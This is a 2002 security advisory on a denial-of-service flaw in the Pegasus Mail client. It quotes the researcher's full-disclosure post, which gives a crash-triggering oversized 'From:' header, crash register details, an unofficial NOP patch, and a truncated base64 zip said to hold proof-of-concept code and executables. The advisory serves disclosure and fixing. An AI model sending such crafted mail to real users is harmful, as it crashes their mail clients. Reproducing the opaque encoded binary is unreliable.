Pegasus Mail Bug in Processing 'From' and 'To' Headers Lets Remote Users Send Mail to Crash the Recipient's Pegasus Mail Client
|
|
SecurityTracker Alert ID: 1004826
|
|
CVE Reference: CAN-2002-1075
(Links to External Site)
|
Updated: Jan 21 2004
|
Original Entry Date: Jul 24 2002
|
Impact: Denial of service via network
|
Fix Available: Yes
Exploit Included: Yes
Vendor Confirmed: Yes
|
Version(s): 4.01
|
Description: A denial of service vulnerability was reported in Pegasus Mail. A remote user can send a specially crafted e-mail message to the
target (victim) user to cause the target user's e-mail client to crash when checking for new mail or when viewing a message.
It is reported that a remote user can place more than 259 characters in either the SMTP "From:" or "To:" mail headers to cause the
recipient's Pegasus Mail client to crash.
A demonstration expoit mail header is shown below:
From: myname <250'A's>
To: test@localhost
Subject:
Good crash
According to the report, the client will crash when checking for new mail or when viewing the affected message. The
recipient may have to manually delete the message before the client will properly reopen. The mail client may also crash when the
recipient attempts to delete the message from the trash.
The author of the report has provided a demonstration exploit and an
unofficial patch in the Source Message (in a Base64-encoded zip file).
The vendor has reportedly been notified.
|
Impact: A remote user can send mail to cause the recipient's mail client to crash.
|
Solution: The vendor has since released a fix [fixed several versions prior to the current version at the time of this Alert modification --
4.12a], available at:
http://www.pmail.com/downloads.htm
The author of the report has provided a temporary and unofficial
patch, available in the Source Message (in a Base64-encoded zip file).
[Editor's note: Your anti-virus software may detect the
exploit in the zip file as a virus.]
|
Vendor URL: www.pmail.com (Links to External Site)
|
Cause: Boundary error
|
Underlying OS: Windows (Any)
|
Reported By: Auriemma Luigi <bugtest@sitoverde.com>
|
Message History:
None.
|
Source Message Contents
|
Date: Wed, 24 Jul 2002 21:51:09 +0000
From: Auriemma Luigi <bugtest@sitoverde.com>
Subject: Pegasus mail DoS
|
--------------Boundary-00=_9PWRUG9D5S1232HA1OBB
Content-Type: text/plain;
charset="iso-8859-1"
Content-Transfer-Encoding: 8bit
######################################################################
Application: Pegasus mail (http://www.pmail.com)
Version: 4.01 and possibly previous
Bug: Bad management of "From:" and "To:" mail headers
Risk: DoS and in some cases the client cannot be opened until
the user have not cancelled the saved mail in the mail
folder
Author: Auriemma Luigi (e-mail: bugtest@sitoverde.com)
######################################################################
Sections:
1) Introduction
2) Bug
3) The Code
4) Fix
5) Philosophy
----------------------------------------------------------------------
1) Introduction
Pegasus mail seems to be a diffused free mail client for Windows (32
and 16 bit) and Dos.
The version I have tested is the latest in this moment: 4.01 for
Win32.
The OS used for do the test is Win98SE (so something can differ a bit
from who have NT/2K/XP or others)
Naturally I have contacted all the supports mail addresses specified
in the program but I have received no answers, so there is not
official fix available.
However this is not a big problem because an advisory is also useful
for keep the attention of the vulnerable program's author.
----------------------------------------------------------------------
2) Bug
The bug is in the management of the headers "From:" and "To:" that
are in the mail received.
Pegasus mail can manage only max 259 chars in these two fields, so
the problem is when an attacker send some charaters more.
For example, the following is a proof-of-concept mail:
/*mail*/
From: myname <250'A's>
To: test@localhost
Subject: Good crash
You cannot see this text 8-)
/*end_mail*/
(the 260 chars are counted after "From:" so we have " myname <" +
250 'A's + ">" = 260, and with the "To:" header is identical)
Now there are some different results about the crash of the program,
and this seems caused by our activated program options.
It can crash when we want to open the mail, or it will crash just
when we want to check our mails and the great problem is when we
reopen the client because the mail is cached in the user mail
folder so the problem continue until he don't delete this bad
mail.
Another problem is that the malformed mail seems to be
undeleteable from the program, because when you want to delete it
from the trash Pegasus crash again.
So after moved the mail in the trash, restart the program so it
delete the mail automatically without crash.
Now I want to show what are the errors (yes we get 2 errors, one
after the other), and the different situation about the field we
want to exploit:
"From:"
The first error happen when the EIP reach 0x004157c0 and the
exploited header have filled EDX register.
"To:"
The first error happen when the EIP reach 0x004c668c and the
exploited header have filled EAX and EDI registers.
The second happen in Kernel32.dll at EIP 0xbffc04d4.
----------------------------------------------------------------------
3) The Code
In attachment you can found:
a) a little proof-of-concept for send a mail with the "From:" field
oversized.
The source code and the exe are for Win.
b) a patcher for the version 4.01 of the program that use my personal
and unofficial fix (useful if someone don't know how to use an hex
editor).
c) an Italian version of this advisory.
----------------------------------------------------------------------
4) Fix
No official patch.
See the Pegasus mail site (http://www.pmail.com) for updates.
I have done a PERSONAL and NOT OFFICIAL fix for the version 4.01:
File: winpm-32.exe
address value
14DC3 90
14DC4 90
14DD7 90
14DD8 90
The NOP trick run well and seems that all the functions are ok,
but remember that it is only temporary!
----------------------------------------------------------------------
5) Philosophy
I'm really hopeful about the FULL-DISCLOSURE, because with that
"everyone" can know the real effects of an attack, the real danger of
a bug, someone can learn a bit of programming (I have learn a bit of
C from the source code of some exploits) and it's useful for all the
people that are hopeful in this type of disclosure.
No secrets!
----------------------------------------------------------------------
Any type of feedback is really welcome!
Byez
--------------Boundary-00=_9PWRUG9D5S1232HA1OBB
Content-Type: application/x-zip;
name="pegasus.zip"
Content-Transfer-Encoding: base64
Content-Description: Advisory, proof-of-concept and my fix
Content-Disposition: attachment; filename="pegasus.zip"
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
